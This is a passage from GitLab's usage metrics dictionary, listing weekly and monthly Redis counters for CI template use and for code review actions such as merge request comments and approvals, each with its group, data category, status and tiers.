`redis_hll_counters.ci_templates.p_ci_templates_aws_deploy_ecs_weekly` + +Count of projects using `AWS/Deploy-ECS.gitlab-ci.yml` template in last 7 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184528_p_ci_templates_aws_deploy_ecs_weekly.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_auto_devops_build_monthly` + +Count of pipelines with implicit Auto Build runs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184502_p_ci_templates_implicit_auto_devops_build_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_auto_devops_build_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184500_p_ci_templates_implicit_auto_devops_build_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_auto_devops_deploy_monthly` + +Count of pipelines with implicit Auto Deploy runs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184506_p_ci_templates_implicit_auto_devops_deploy_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_auto_devops_deploy_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184504_p_ci_templates_implicit_auto_devops_deploy_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_auto_devops_monthly` + +Count of pipelines with implicit Auto DevOps runs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184458_p_ci_templates_implicit_auto_devops_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_auto_devops_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184456_p_ci_templates_implicit_auto_devops_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_security_sast_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184510_p_ci_templates_implicit_security_sast_monthly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_security_sast_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184508_p_ci_templates_implicit_security_sast_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_security_secret_detection_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184513_p_ci_templates_implicit_security_secret_detection_monthly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.ci_templates.p_ci_templates_implicit_security_secret_detection_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184512_p_ci_templates_implicit_security_secret_detection_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_security_sast_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184546_p_ci_templates_security_sast_monthly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.ci_templates.p_ci_templates_security_sast_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184544_p_ci_templates_security_sast_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_security_secret_detection_monthly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184551_p_ci_templates_security_secret_detection_monthly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `redis_hll_counters.ci_templates.p_ci_templates_security_secret_detection_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184549_p_ci_templates_security_secret_detection_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.ci_templates.p_ci_templates_terraform_base_latest_monthly` + +Count of pipelines that include the terraform base template from GitLab + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184555_p_ci_templates_terraform_base_latest_monthly.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.ci_templates.p_ci_templates_terraform_base_latest_weekly` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216184553_p_ci_templates_terraform_base_latest_weekly.yml) + +Group: `` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: + +### `redis_hll_counters.code_review.code_review_total_unique_counts_monthly` + +Count of unique users per month who interact with a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184454_code_review_total_unique_counts_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.code_review_total_unique_counts_weekly` + +Count of unique users per week who interact with a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184452_code_review_total_unique_counts_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_click_diff_view_setting_monthly` + +Count of users clicking diff view setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210607113556_i_code_review_click_diff_view_setting_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_click_diff_view_setting_weekly` + +Count of users clicking diff view setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210607113552_i_code_review_click_diff_view_setting_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_click_file_browser_setting_monthly` + +Count of users clicking merge request file browser setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210421145818_i_code_review_click_file_browser_setting_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_click_file_browser_setting_weekly` + +Count of users with merge request file list setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210421145814_i_code_review_click_file_browser_setting_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_click_single_file_mode_setting_monthly` + +Count of users clicking single file mode setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210421144352_i_code_review_click_single_file_mode_setting_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_click_single_file_mode_setting_weekly` + +Count of users clicking single file mode setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210421144349_i_code_review_click_single_file_mode_setting_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_click_whitespace_setting_monthly` + +Count of users clicking merge request whitespae setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210421145945_i_code_review_click_whitespace_setting_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_click_whitespace_setting_weekly` + +Count of users clicking merge request whitespae setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210421145942_i_code_review_click_whitespace_setting_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_hide_whitespace_monthly` + +Count of users with show whitespace disabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210422102010_i_code_review_diff_hide_whitespace_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_hide_whitespace_weekly` + +Count of users with show whitespace disabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210422102007_i_code_review_diff_hide_whitespace_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_multiple_files_monthly` + +Count of users with single mode disabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210422102202_i_code_review_diff_multiple_files_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_multiple_files_weekly` + +Count of users with single mode disabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210422102159_i_code_review_diff_multiple_files_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_show_whitespace_monthly` + +Count of users with show whitespace enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210422101928_i_code_review_diff_show_whitespace_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_show_whitespace_weekly` + +Count of users with show whitespace enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210422101925_i_code_review_diff_show_whitespace_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_single_file_monthly` + +Count of users with single file mode enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210422102121_i_code_review_diff_single_file_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_single_file_weekly` + +Count of users with single file mode enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210422102118_i_code_review_diff_single_file_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_view_inline_monthly` + +Count of users with merge request view type as inline + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210422101516_i_code_review_diff_view_inline_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_view_inline_weekly` + +Count of users with merge request view type as inline + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210422101512_i_code_review_diff_view_inline_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_view_parallel_monthly` + +Count of users with merge request view type as parallel + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210422101613_i_code_review_diff_view_parallel_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_diff_view_parallel_weekly` + +Count of users with merge request view type as parallel + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210422101609_i_code_review_diff_view_parallel_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_edit_mr_desc_monthly` + +Count of unique users per month who edit the description of a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184342_i_code_review_edit_mr_desc_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_edit_mr_desc_weekly` + +Count of unique users per week who edit the description of a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184340_i_code_review_edit_mr_desc_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_edit_mr_title_monthly` + +Count of unique users per month who edit the title of a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184338_i_code_review_edit_mr_title_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_edit_mr_title_weekly` + +Count of unique users per week who edit the title of a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184336_i_code_review_edit_mr_title_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_file_browser_list_view_monthly` + +Count of users with merge request file list setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210422101852_i_code_review_file_browser_list_view_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_file_browser_list_view_weekly` + +Count of users with merge request file list setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210422101849_i_code_review_file_browser_list_view_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_file_browser_tree_view_monthly` + +Count of users with merge request file tree setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210422101753_i_code_review_file_browser_tree_view_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_file_browser_tree_view_weekly` + +Count of users with merge request file tree setting + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210422101750_i_code_review_file_browser_tree_view_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_mr_diffs_monthly` + +Count of unique merge requests per month with diffs viewed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175120_i_code_review_mr_diffs_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_mr_diffs_weekly` + +Count of unique merge requests per week with diffs viewed + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175118_i_code_review_mr_diffs_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_mr_single_file_diffs_monthly` + +Count of unique merge requests per month with diffs viewed file by file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175128_i_code_review_mr_single_file_diffs_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_mr_single_file_diffs_weekly` + +Count of unique merge requests per week with diffs viewed file by file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175126_i_code_review_mr_single_file_diffs_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_add_suggestion_monthly` + +Count of unique users per month who added a suggestion + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175159_i_code_review_user_add_suggestion_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_add_suggestion_weekly` + +Count of unique users per week who added a suggestion + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175158_i_code_review_user_add_suggestion_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_apply_suggestion_monthly` + +Count of unique users per month who applied a suggestion + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175203_i_code_review_user_apply_suggestion_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_apply_suggestion_weekly` + +Count of unique users per week who applied a suggestion + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175201_i_code_review_user_apply_suggestion_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_approval_rule_added_monthly` + +Count of unique users per month who add an approval rule to a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184434_i_code_review_user_approval_rule_added_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_approval_rule_added_weekly` + +Count of unique users per week who add an approval rule to a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184432_i_code_review_user_approval_rule_added_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_approval_rule_deleted_monthly` + +Count of unique users per month who delete an approval rule to a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184438_i_code_review_user_approval_rule_deleted_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_approval_rule_deleted_weekly` + +Count of unique users per week who delete an approval rule to a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184436_i_code_review_user_approval_rule_deleted_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_approval_rule_edited_monthly` + +Count of unique users per month who delete an approval rule to a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184442_i_code_review_user_approval_rule_edited_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_approval_rule_edited_weekly` + +Count of unique users per week who edit an approval rule to a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184440_i_code_review_user_approval_rule_edited_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_approve_mr_monthly` + +Count of unique users per month who approve a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184322_i_code_review_user_approve_mr_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_approve_mr_weekly` + +Count of unique users per week who approve a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184320_i_code_review_user_approve_mr_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_assigned_monthly` + +Count of unique users per month who are assigned to a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184418_i_code_review_user_assigned_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_assigned_weekly` + +Count of unique users per week who are assigned to a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184416_i_code_review_user_assigned_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_assignees_changed_monthly` + +Count of unique users per month who changed assignees of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210302114145_i_code_review_user_assignees_changed_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_assignees_changed_weekly` + +Count of unique users per week who changed assignees of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302114202_i_code_review_user_assignees_changed_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_close_mr_monthly` + +Count of unique users per month who closed a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175136_i_code_review_user_close_mr_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_close_mr_weekly` + +Count of unique users per week who closed a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175134_i_code_review_user_close_mr_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_mr_comment_monthly` + +Count of unique users per month who commented on a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175148_i_code_review_user_create_mr_comment_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_mr_comment_weekly` + +Count of unique users per week who commented on a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175146_i_code_review_user_create_mr_comment_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_mr_from_issue_monthly` + +Count of unique users per month who create a merge request from an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184450_i_code_review_user_create_mr_from_issue_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_mr_from_issue_weekly` + +Count of unique users per week who create a merge request from an issue + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184448_i_code_review_user_create_mr_from_issue_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_mr_monthly` + +Count of unique users per month who created a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175132_i_code_review_user_create_mr_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_mr_weekly` + +Count of unique users per week who created a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175130_i_code_review_user_create_mr_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_multiline_mr_comment_monthly` + +Count of unique users per month who create a multiline comment in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184401_i_code_review_user_create_multiline_mr_comment_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_multiline_mr_comment_weekly` + +Count of unique users per week who create a multiline comment in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184359_i_code_review_user_create_multiline_mr_comment_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_review_note_monthly` + +Count of unique users per month who create a note as part of a merge request review + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184353_i_code_review_user_create_review_note_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_create_review_note_weekly` + +Count of unique users per week who create a note as part of a merge request review + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184351_i_code_review_user_create_review_note_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_edit_mr_comment_monthly` + +Count of unique users per month who edited a comment on a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175152_i_code_review_user_edit_mr_comment_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_edit_mr_comment_weekly` + +Count of unique users per week who edited a comment on a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175150_i_code_review_user_edit_mr_comment_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_edit_multiline_mr_comment_monthly` + +Count of unique users per week who edit a multiline 